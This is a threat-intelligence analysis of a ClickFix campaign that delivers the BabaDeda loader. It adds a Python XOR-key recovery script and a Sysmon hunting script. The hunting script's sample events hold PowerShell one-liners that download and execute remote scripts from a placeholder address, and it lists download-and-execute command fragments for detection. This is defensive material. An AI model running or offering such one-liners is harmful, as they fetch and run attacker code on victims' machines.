What Is the BabaDeda Loader? Analysis of a New ClickFix Malware Campaign
Morphisec researchers identified a significantly evolved version of the BabaDeda loader targeting the education and financial sectors. The campaign leverages ClickFix social engineering to trick users into executing PowerShell commands, leading to a complex, multi-stage infection chain involving DLL sideloading, in-memory execution, and external payload storage to deliver DanaBot and SectopRAT.
- File name: linguist.zip. Disguised package containing roughly 30 files used to facilitate DLL sideloading.
- File name: List.Control.dat. External payload storage file used by the loader to hide malicious bytes until runtime.
What Happened
Cybersecurity researchers have discovered a new version of a malicious program called BabaDeda targeting schools and banks. The attack starts with a fake security check or CAPTCHA that tricks people into copying and pasting a hidden command into their computer. Once run, the malware secretly downloads and hides its components, eventually stealing passwords and giving attackers remote control of the system. Because the malware hides its true nature until the last possible second, traditional antivirus tools struggle to catch it. Organizations should focus on preventing unauthorized code from running in the first place and educate users about fake browser prompts.
Key Takeaways
- A new, highly evasive version of the BabaDeda loader was observed targeting education and financial organizations.
- The attack initiates via ClickFix social engineering, tricking users into executing malicious PowerShell commands via fake CAPTCHA prompts.
- The loader utilizes modular staging, external payload storage (e.g., List.Control.dat), and in-memory execution to evade file-based detection.
- Payloads are injected into trusted processes like svchost.exe and include DanaBot and SectopRAT.
- The malware includes environmental checks to avoid executing on Russian or Belarusian systems.
Affected Systems
- Windows operating systems
- Education and financial sector organizations
Attack Chain
The attack begins with a ClickFix social engineering lure, presenting a fake CAPTCHA that tricks the victim into executing a PowerShell command. This command runs a script in memory, launching a hidden PowerShell process that downloads subsequent payloads over plain HTTP. The loader performs locale checks, avoiding execution in Russia and Belarus, before downloading a disguised package (linguist.zip) and injecting code into svchost.exe. Finally, it uses DLL sideloading to read an XOR-encoded payload from an external file (List.Control.dat) and executes the final payload (DanaBot or SectopRAT) in memory via legitimate Windows callback functions.
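The external-payload step above, stated generally: when a loader keeps its final stage XOR-encoded in a side file, the quickest triage is known-plaintext key recovery against the PE header, because every standard Windows PE starts with "MZ", carries the string "This program cannot be run in DOS mode" in its DOS stub, and has the "PE\0\0" signature at the offset stored in e_lfanew. The following is an added example, not code from the report or from Morphisec; it does not know BabaDeda's key, key length or exact encoding and instead demonstrates the generic technique on a constructed stand-in for List.Control.dat encoded with a made-up five-byte key (5a c3 10 77 ee).

```python
"""Recover a repeating XOR key from an externally stored, encoded PE payload.

Added example, not from the original report. The page says the final payload is
read XOR-encoded from List.Control.dat but gives neither key nor key length, so
this implements the general known-plaintext triage: the DOS stub string that
standard PEs carry fixes the key bytes, and the decoded header is then checked
for "MZ" at offset 0 and the PE signature at e_lfanew. The sample blob and the
five-byte key (5a c3 10 77 ee) are constructed here for illustration.
"""
import struct

DOS_STUB_MSG = b"This program cannot be run in DOS mode"


def xor_bytes(data, key):
    """Repeating-key XOR (encode and decode are the same operation)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def _key_from_known_plaintext(blob, offset, plaintext, key_len):
    """Key slots implied by `plaintext` sitting at `offset`; None on contradiction."""
    key = [None] * key_len
    for i, p in enumerate(plaintext):
        slot = (offset + i) % key_len
        k = blob[offset + i] ^ p
        if key[slot] is None:
            key[slot] = k
        elif key[slot] != k:
            return None
    return key


def looks_like_pe(decoded):
    """Header sanity check: 'MZ' at 0 and the PE signature where e_lfanew (0x3C) points."""
    if len(decoded) < 0x40 or decoded[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", decoded, 0x3C)[0]
    return e_lfanew + 4 <= len(decoded) and decoded[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def recover_xor_key(blob, max_key_len=16, search_window=0x200, header_len=0x1000):
    """Slide DOS_STUB_MSG over the first `search_window` bytes for key lengths
    1..max_key_len; return (key, stub_offset) for the first candidate whose
    decoded header passes looks_like_pe(), else None. Only the header region is
    decoded per candidate, so this stays fast on large blobs."""
    head = blob[:header_len]
    last = min(search_window, len(blob) - len(DOS_STUB_MSG) + 1)
    for key_len in range(1, max_key_len + 1):
        for off in range(0x40, last):  # the stub follows the 0x40-byte DOS header
            key = _key_from_known_plaintext(blob, off, DOS_STUB_MSG, key_len)
            if key is None or any(k is None for k in key):
                continue  # contradiction, or key longer than the known text covers
            key = bytes(key)
            if looks_like_pe(xor_bytes(head, key)):
                return key, off
    return None


def build_fake_pe():
    """Constructed stand-in for a payload: valid MZ/PE skeleton, no real code."""
    hdr = bytearray(0x200)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x100)                # e_lfanew
    hdr[0x4E:0x4E + len(DOS_STUB_MSG)] = DOS_STUB_MSG        # usual MSVC stub position
    hdr[0x100:0x104] = b"PE\0\0"
    struct.pack_into("<H", hdr, 0x104, 0x8664)               # Machine = AMD64
    return bytes(hdr) + bytes(range(256)) * 4                # filler standing in for sections


SAMPLE_KEY = b"\x5a\xc3\x10\x77\xee"                         # constructed, not the real key
ENCODED_SAMPLE = xor_bytes(build_fake_pe(), SAMPLE_KEY)      # stand-in for List.Control.dat

if __name__ == "__main__":
    found = recover_xor_key(ENCODED_SAMPLE)
    print("recovered:", found and (found[0].hex(), hex(found[1])))
```

The consistency check inside `_key_from_known_plaintext` does most of the work: a wrong offset or wrong key length contradicts itself within the 38-byte string, so the PE-signature check rarely has to reject anything. If a sample's DOS stub has been replaced (some linkers and packers do this), slide a different known string, or use the normally zero reserved fields of the DOS header (0x1C to 0x3B) as the known plaintext instead.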
Detection Availability
- YARA Rules: No
- Sigma Rules: No
- Snort/Suricata Rules: No
- KQL Queries: No
- Splunk SPL Queries: No
- EQL Queries: No
- Other Detection Logic: No
The article does not provide specific detection rules inline, but mentions that a full technical breakdown with IOCs is available in an attached PDF report.
Detection Engineering Assessment
- EDR Visibility: Medium. The malware uses in-memory execution, DLL sideloading and legitimate Windows callbacks to evade file-based detection; EDRs with memory scanning and process-injection telemetry (cross-process handle opens, remote thread creation) may still catch the svchost.exe injection.
- Network Visibility: Medium. Payloads are pulled over plain HTTP, so the downloads are visible in cleartext at any inspection point, but the initial access step is a user pasting a command after interacting with a web prompt and leaves little network signal of its own.
- Detection Difficulty: Hard. The modular staging, external payload storage and in-memory execution via callbacks defeat static signatures and most standard behavioral rules.
Required Log Sources
- Process Creation with command line (Event ID 4688 with command-line auditing enabled / Sysmon 1)
- PowerShell Script Block Logging (Event ID 4104), since the first stage runs in memory and the 4688 command line may show only the downloader one-liner
- Network Connections (Sysmon 3)
- Image Loaded (Sysmon 7)
- Process Access (Sysmon 10)
Hunting Hypotheses
| Hypothesis | Telemetry | ATT&CK Stage | FP Risk |
|---|---|---|---|
| Consider hunting for suspicious PowerShell execution originating from web browsers or unusual parent processes, indicating potential ClickFix exploitation. | Process Creation | Execution | Medium |
| Look for unexpected DLL loads or process injection targeting svchost.exe, especially if the injecting process is a recently downloaded or unknown executable. | Process Access / Image Loaded | Defense Evasion | Low |
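Both hypotheses in the table, as an added example that is not part of the original report: the checks below run over a handful of constructed Sysmon-style events (Event IDs 1 and 10) and flag PowerShell launched from a browser, or from explorer.exe with ClickFix-style flags, and non-system processes opening svchost.exe with injection-capable access rights. The explorer.exe parent (the Win+R Run dialog that copy-paste lures typically send victims to), the suspicious-fragment list, the sample paths and the 203.0.113.10 address are assumptions for illustration, not facts from the report.

```python
"""Hunting checks for the two hypotheses above, run over constructed Sysmon-style events.

Added example, not from the original report. Field names follow Sysmon (Image,
ParentImage, CommandLine, SourceImage, TargetImage, GrantedAccess); the sample
events, paths and the 203.0.113.10 address are constructed for illustration.
"""

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "opera.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# Command-line fragments typical of ClickFix one-liners: hidden window, no profile,
# download-and-execute in memory, cleartext HTTP. Assumed, not taken from the report.
SUSPICIOUS_FRAGMENTS = (
    "-w hidden", "-windowstyle hidden", "-nop", "-noprofile", "-enc",
    "-encodedcommand", "iex", "invoke-expression", "downloadstring",
    "invoke-webrequest", "irm ", "iwr ", "http://",
)

# PROCESS_* rights that injection needs; Sysmon logs GrantedAccess as a hex string.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
INJECT_MASK = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def in_system_dir(path):
    return path.lower().startswith(SYSTEM_DIRS)


def check_clickfix_powershell(ev):
    """Hypothesis 1 (Sysmon Event ID 1): PowerShell spawned by a browser, or by
    explorer.exe (the Run dialog; an assumption about the lure) with suspicious
    flags. Returns a reason string or None."""
    if ev.get("EventID") != 1 or basename(ev["Image"]) not in POWERSHELL:
        return None
    parent = basename(ev["ParentImage"])
    cmd = ev["CommandLine"].lower()
    hits = [f for f in SUSPICIOUS_FRAGMENTS if f in cmd]
    if parent in BROWSERS:
        return f"powershell spawned by browser {parent}; flags={hits}"
    if parent == "explorer.exe" and hits:
        return f"powershell from explorer.exe (Run dialog) with {hits}"
    return None


def check_svchost_injection(ev):
    """Hypothesis 2 (Sysmon Event ID 10): a process outside System32/SysWOW64
    opens svchost.exe with rights sufficient to write memory or start a thread."""
    if ev.get("EventID") != 10 or basename(ev["TargetImage"]) != "svchost.exe":
        return None
    if in_system_dir(ev["SourceImage"]):
        return None  # system components legitimately open svchost.exe
    granted = int(ev["GrantedAccess"], 16)
    if granted & INJECT_MASK:
        return f"{ev['SourceImage']} opened svchost.exe with access 0x{granted:X}"
    return None


CHECKS = (
    ("clickfix_powershell", check_clickfix_powershell),
    ("svchost_injection", check_svchost_injection),
)


def run_hunt(events):
    """Return (rule, RecordId, reason) for every event a check fires on."""
    findings = []
    for ev in events:
        for name, check in CHECKS:
            reason = check(ev)
            if reason:
                findings.append((name, ev["RecordId"], reason))
    return findings


PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SVCHOST = r"C:\Windows\System32\svchost.exe"

# Constructed sample telemetry: records 2, 3 and 5 should fire, the rest should not.
SAMPLE_EVENTS = [
    {"RecordId": 1, "EventID": 1, "Image": PS_EXE,  # admin at a console
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe Get-Service"},
    {"RecordId": 2, "EventID": 1, "Image": PS_EXE,  # pasted into Win+R
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -nop -c "iex (iwr http://203.0.113.10/v.txt -UseBasicParsing)"'},
    {"RecordId": 3, "EventID": 1, "Image": PS_EXE,  # spawned by the browser
     "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": 'powershell -ep bypass -c "iex (irm http://203.0.113.10/a.ps1)"'},
    {"RecordId": 4, "EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": SVCHOST, "GrantedAccess": "0x1FFFFF"},
    {"RecordId": 5, "EventID": 10,  # dropped binary injecting
     "SourceImage": r"C:\Users\victim\AppData\Local\Temp\stage.exe",
     "TargetImage": SVCHOST, "GrantedAccess": "0x1F0FFF"},
    {"RecordId": 6, "EventID": 10,  # read-only query, not flagged
     "SourceImage": r"C:\Program Files\Monitor\taskviewer.exe",
     "TargetImage": SVCHOST, "GrantedAccess": "0x1000"},
]

if __name__ == "__main__":
    for rule, rid, reason in run_hunt(SAMPLE_EVENTS):
        print(f"[{rule}] record {rid}: {reason}")
```

The access-mask test uses only the bits injection needs rather than exact values such as 0x1F0FFF, so a variant requesting narrower rights is still caught; expect to allow-list security agents and debuggers that legitimately open svchost.exe from Program Files, which is where the Low FP rating in the table comes from in practice.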
Control Gaps
- File-based Antivirus
- Static Signature Detection
Key Behavioral Indicators
- PowerShell executing hidden commands after browser interaction
- svchost.exe being injected into by non-system processes
- Presence of linguist.zip or List.Control.dat in user directories
False Positive Assessment
- Low
Recommendations
Immediate Mitigation
- Verify against your organization's incident response runbook and team escalation paths before acting.
- Consider searching endpoint telemetry for the presence of 'linguist.zip' or 'List.Control.dat'.
- Evaluate whether network logs show unusual plain HTTP downloads originating from PowerShell.
Infrastructure Hardening
- If supported by your environment, consider implementing application control to restrict the execution of unknown binaries and scripts.
- Evaluate network filtering rules to block or inspect plain HTTP traffic for suspicious payload downloads.
User Protection
- Consider deploying endpoint protection that includes memory scanning and behavioral analysis to detect process injection.
- If applicable, restrict PowerShell for standard users, bearing in mind that the execution policy is not a security boundary (a pasted one-liner can pass -ExecutionPolicy Bypass or run via -EncodedCommand); Constrained Language Mode or application control enforced on the script hosts is what actually limits what a pasted command can do.
Security Awareness
- Consider updating security awareness training to include the 'ClickFix' technique, specifically warning users about fake CAPTCHA or verification prompts that ask them to copy and paste commands.
MITRE ATT&CK Mapping
- T1566.002 - Phishing: Spearphishing Link
- T1204.004 - User Execution: Malicious Copy and Paste
- T1059.001 - Command and Scripting Interpreter: PowerShell
- T1055 - Process Injection
- T1574.002 - Hijack Execution Flow: DLL Side-Loading
- T1620 - Reflective Code Loading
- T1140 - Deobfuscate/Decode Files or Information
- T1614.001 - System Location Discovery: System Language Discovery
Additional IOCs
- Command Lines:
  - Purpose: Initial execution via ClickFix social engineering lure | Tools: PowerShell | Stage: Initial Access (the command string itself is not reproduced on this page)
- Other:
  - 0xBABADEDA: Internal constant embedded in the loader's code for its task handler.